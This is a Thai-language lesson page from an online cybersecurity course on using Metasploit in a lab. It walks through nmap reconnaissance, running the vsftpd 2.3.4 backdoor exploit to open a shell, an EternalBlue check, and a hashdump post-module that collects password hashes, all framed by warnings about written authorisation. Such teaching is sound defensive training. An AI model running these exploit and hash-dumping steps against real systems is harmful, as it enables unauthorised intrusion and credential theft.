การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว
ใช้โมดูลช่องโหว่กับเป้าหมายที่มีช่องโหว่ในห้องปฏิบัติการ และตีความผลลัพธ์ของเซสชัน
การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
จริยธรรมและการได้รับอนุญาตต้องมาก่อน
การใช้ประโยชน์จากช่องโหว่จะถูกกฎหมายเฉพาะเมื่อทำกับระบบที่คุณเป็นเจ้าของหรือได้รับอนุญาตเป็นลายลักษณ์อักษรอย่างชัดเจนให้ทดสอบเท่านั้น ตัวอย่างทั้งหมดในบทนี้มีไว้สำหรับสภาพแวดล้อมห้องปฏิบัติการที่ได้รับอนุญาต การใช้ประโยชน์จากช่องโหว่โดยไม่ได้รับอนุญาตถือเป็นความผิดทางอาญา
คำแนะนำในการตั้งค่าห้องปฏิบัติการ
ใช้ VM ที่มีช่องโหว่โดยตั้งใจ เช่น Metasploitable2/3, DVWA, เครื่องจาก VulnHub หรือ HackTheBox/TryHackMe เพื่อฝึกอย่างถูกกฎหมาย อย่าทดสอบกับระบบที่ใช้งานจริงหรือระบบในโลกจริงโดยไม่มีเอกสารขอบเขตงานที่ลงนามแล้ว
# Download Metasploitable2
# https://sourceforge.net/projects/metasploitable/
# Or use VulnHub
# https://www.vulnhub.com/
# Network: host-only adapter (isolated)การลาดตระเวนก่อนใช้ประโยชน์จากช่องโหว่
แจกแจงข้อมูลก่อนใช้ประโยชน์จากช่องโหว่เสมอ ต้องทราบรุ่นบริการที่แน่นอน ระบบปฏิบัติการ และบริบทก่อนเลือกโค้ดโจมตีช่องโหว่ รุ่นไม่ตรงกัน = การโจมตีล้มเหลวหรือระบบหยุดทำงาน
sudo nmap -sV -O 192.168.1.100
# Identify:
# - OS version
# - Service + exact version
# - Open ports
# Then search Metasploit for matching exploitการเลือกโค้ดโจมตีช่องโหว่ที่เหมาะสม
ค้นหาตามชื่อบริการและรุ่น ควรเลือกโมดูลที่มีระดับ Excellent หรือ Great อ่าน info เพื่อยืนยันว่าแพลตฟอร์มเป้าหมายและช่วงรุ่นตรงกัน
msf6 > search vsftpd 2.3.4
# exploit/unix/ftp/vsftpd_234_backdoor
# Rank: Excellent
msf6 > info exploit/unix/ftp/vsftpd_234_backdoorการกำหนดค่าและเรียกใช้โค้ดโจมตีช่องโหว่
กำหนด RHOSTS (เป้าหมายระยะไกล), LHOST (IP ของคุณสำหรับการเชื่อมต่อย้อนกลับ), LPORT (พอร์ตที่รับฟัง) เลือกเพย์โหลด แล้วจึงเรียกใช้ สังเกตการสร้างเซสชันหรือข้อความแสดงข้อผิดพลาด
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > set RHOSTS 192.168.1.100
msf6 > set payload cmd/unix/interact
msf6 > run
# [*] Command shell session 1 openedการตีความผลลัพธ์
การโจมตีช่องโหว่ที่สำเร็จจะเปิดเซสชัน การโจมตีที่ล้มเหลวจะแสดงข้อความแสดงข้อผิดพลาด ได้แก่ ปฏิเสธการเชื่อมต่อ (พอร์ตไม่ได้เปิดอยู่), การโจมตีช่องโหว่ล้มเหลว (รุ่นไม่ถูกต้อง), ไม่มีการสร้างเซสชัน (เพย์โหลดเชื่อมต่อกลับไม่สำเร็จ)
# Success:
[*] Started reverse TCP handler
[*] Command shell session 1 opened
# Failure:
[-] Exploit aborted: Bad return value from check
[-] Exploit failed: No session was createdการโต้ตอบกับเซสชัน
หลังใช้ประโยชน์จากช่องโหว่ ให้โต้ตอบกับเซสชันด้วย sessions -i เซสชันเชลล์คำสั่งพื้นฐานจะให้เทอร์มินัล ส่วนเซสชัน Meterpreter จะมี API ที่ครบความสามารถมากกว่า
msf6 > sessions # list all sessions
msf6 > sessions -i 1 # interact with session 1
# Once inside:
id
whoami
ifconfig
uname -aการพักไว้เบื้องหลังและหลายเซสชัน
กด Ctrl+Z เพื่อพักเซสชันไว้เบื้องหลังและกลับไปยัง msfconsole การทำเช่นนี้ช่วยให้คุณจัดการหลายเซสชันหรือเรียกใช้โมดูลหลังการใช้ประโยชน์จากช่องโหว่กับเซสชันที่ระบุได้
# Background active session
Ctrl+Z
# List sessions
msf6 > sessions
# Run post module against session 1
msf6 > use post/linux/gather/hashdump
msf6 > set SESSION 1
msf6 > runคำสั่งตรวจสอบ
โมดูลโจมตีช่องโหว่จำนวนมากมีคำสั่ง check สำหรับตรวจสอบว่าเป้าหมายมีช่องโหว่หรือไม่โดยไม่ใช้ประโยชน์จากช่องโหว่จริง ควรเรียกใช้ check ก่อนเสมอหากมีคำสั่งนี้
msf6 exploit(ms17_010_eternalblue) > check
# [+] 192.168.1.100:445 - The target is vulnerable.
# Or:
# [-] 192.168.1.100:445 - The target is not vulnerable.ข้อควรพิจารณาด้านความน่าเชื่อถือของโค้ดโจมตีช่องโหว่
โค้ดโจมตีช่องโหว่อาจทำให้บริการหยุดทำงาน กระตุ้นการแจ้งเตือน หรือทิ้งบันทึกไว้ ในการประเมินระบบที่ใช้งานจริง ให้กำหนดเวลาเรียกใช้โค้ดโจมตีในช่วงที่มีการใช้งานน้อย เตรียมแผนย้อนกลับ และยืนยันว่ามีข้อมูลสำรองก่อนเรียกใช้สิ่งใดก็ตามที่อาจสร้างความเสียหาย
การจัดทำเอกสารการใช้ประโยชน์จากช่องโหว่
บันทึกข้อมูลต่อไปนี้: เวลา เป้าหมาย IP และพอร์ต โมดูลโจมตีช่องโหว่ที่ใช้ หมายเลข CVE เพย์โหลดที่ใช้ เซสชันที่ได้รับ และหลักฐาน (ภาพหน้าจอหรือผลลัพธ์จากเทอร์มินัล) สิ่งนี้คือหลักฐานยืนยันช่องโหว่สำหรับรายงาน
ตรวจสอบอย่างรวดเร็ว
คำสั่ง "check" ของ Metasploit ทำหน้าที่อะไร
สรุป: การใช้ประโยชน์จากช่องโหว่
การใช้ประโยชน์จากช่องโหว่อย่างมีจริยธรรมต้องดำเนินตามขั้นตอนที่ชัดเจน ได้แก่ ขออนุญาตเป็นลายลักษณ์อักษร แจกแจงข้อมูลอย่างรอบคอบ เลือกโค้ดโจมตีช่องโหว่ที่ตรงกัน อ่านข้อมูลโมดูล เรียกใช้ check ก่อนหากมีคำสั่งนี้ จากนั้นจึงดำเนินการและจัดทำเอกสารทุกอย่าง อย่าใช้ประโยชน์จากช่องโหว่โดยไม่ได้รับอนุญาต — ทักษะทางเทคนิคและขอบเขตด้านจริยธรรมแยกจากกันไม่ได้
คำถามที่พบบ่อย
บทเรียน “การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว” ฟรีหรือไม่
ใช่ — ข้อความเต็มของ “การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน
คุณจะเรียนรู้อะไรในบทเรียน “การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว”
ใช้โมดูลช่องโหว่กับเป้าหมายที่มีช่องโหว่ในห้องปฏิบัติการ และตีความผลลัพธ์ของเซสชัน คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน
คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่
ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน
บทเรียน “การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว” ใช้เวลานานแค่ไหน
บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย
ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม
ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ
บทเรียนทั้งหมดในหลักสูตรนี้
- สถาปัตยกรรม Metasploit และ msfconsole
- การใช้ประโยชน์จากช่องโหว่ที่ทราบแล้ว
- เพย์โหลด: แบบแบ่งขั้นกับแบบไม่แบ่งขั้น และ Meterpreter
- หลังการเจาะระบบ: เปลี่ยนเส้นทางและคงอยู่